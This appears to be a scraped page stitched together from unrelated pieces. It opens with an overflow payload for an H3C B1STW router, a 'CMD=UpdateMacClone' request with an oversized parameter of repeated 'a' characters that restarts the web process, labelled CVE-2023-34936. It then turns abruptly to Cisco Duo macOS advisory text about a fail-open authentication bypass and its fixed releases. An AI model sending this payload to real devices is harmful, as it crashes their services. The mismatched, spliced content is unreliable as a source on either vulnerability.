CMD=UpdateMacClone&param=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

**Result**

the process webs restart

CVE-2023-34936: vuln/H3C_B1STW/CVE-2023-34936.md at main · h4kuy4/vuln

A vulnerability in Cisco Duo Two-Factor Authentication for macOS could allow an authenticated, physical attacker to bypass secondary authentication and access an affected macOS device. This vulnerability is due to the incorrect handling of responses from Cisco Duo when the application is configured to fail open. An attacker with primary user credentials could exploit this vulnerability by attempting to authenticate to an affected device. A successful exploit could allow the attacker to access the affected device without valid permission.

*   When considering software upgrades, customers are advised to regularly consult the advisories for Cisco products, which are available from the Cisco Security Advisories page, to determine exposure and a complete upgrade solution.
    
    In all cases, customers should ensure that the devices to be upgraded contain sufficient memory and confirm that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, customers are advised to contact the Cisco Technical Assistance Center (TAC) or their contracted maintenance providers.
    
    **Fixed Releases**
    
    At the time of publication, the release information in the following table was accurate. See the Details section in the bug ID(s) at the top of this advisory for the most complete and current information.
    
    The left column lists Cisco Duo software releases, and the right column indicates whether a release was affected by the vulnerability that is described in this advisory and which release included the fix for this vulnerability.
    
    Cisco Duo Two-Factor Authentication for macOS Release
    
    First Fixed Release
    
    1.1.1 and earlier
    
    Not vulnerable
    
    2.0.0
    
    2.0.2
    
    The Cisco Product Security Incident Response Team (PSIRT) validates only the affected and fixed release information that is documented in this advisory.

Tag

#mac